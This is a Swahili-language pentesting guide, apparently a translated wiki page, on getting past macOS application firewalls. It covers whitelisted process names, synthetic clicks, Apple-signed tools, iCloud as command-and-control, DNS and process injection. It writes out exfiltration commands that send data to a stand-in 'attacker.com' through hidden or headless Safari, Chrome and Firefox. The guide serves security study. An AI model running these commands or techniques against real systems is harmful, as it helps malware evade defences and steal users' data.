macOS Bypassing Firewalls

Mbinu Zilizopatikana

Mbinu zifuatazo zilipatikana zikifanya kazi kwenye baadhi ya programu za firewall za macOS.

Kutumia majina ya orodha nyeupe vibaya

• Kwa mfano kuita zisizo na programu hasidi kwa majina ya michakato inayojulikana ya macOS kama vile launchd

Bonyeza Kisynthetic

• Ikiwa firewall inauliza idhini kwa mtumiaji, fanya programu hasidi ibonyeze ruhusa

Tumia programu zilizosainiwa na Apple

• Kama vile curl, lakini pia nyingine kama whois

Vipeni vya Apple vinavyojulikana

Firewall inaweza kuruhusu uhusiano kwenye vikoa vya Apple vinavyojulikana kama vile apple.com au icloud.com. Na iCloud inaweza kutumika kama C2.

Kupitisha Kwa Ujumla

Mawazo kadhaa ya jaribu kupitisha firewalls

Angalia trafiki iliyoruhusiwa

Kujua trafiki iliyoruhusiwa kutakusaidia kutambua vikoa vilivyowekwa kwenye orodha nyeupe au ni programu zipi zilizoruhusiwa kufikia vikoa hivyo.

lsof -i TCP -sTCP:ESTABLISHED

Kutumia DNS

Ufumbuzi wa DNS unafanywa kupitia programu iliyosainiwa ya mdnsreponder ambayo labda itaruhusiwa kuwasiliana na seva za DNS.

Kupitia Programu za Kivinjari

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Kupitia sindano za michakato

Ikiwa unaweza kuingiza nambari ndani ya mchakato ambao una ruhusa ya kuunganisha kwenye seva yoyote unaweza kudukua ulinzi wa firewall:

Marejeo

• https://www.youtube.com/watch?v=UlT5KFTMn2k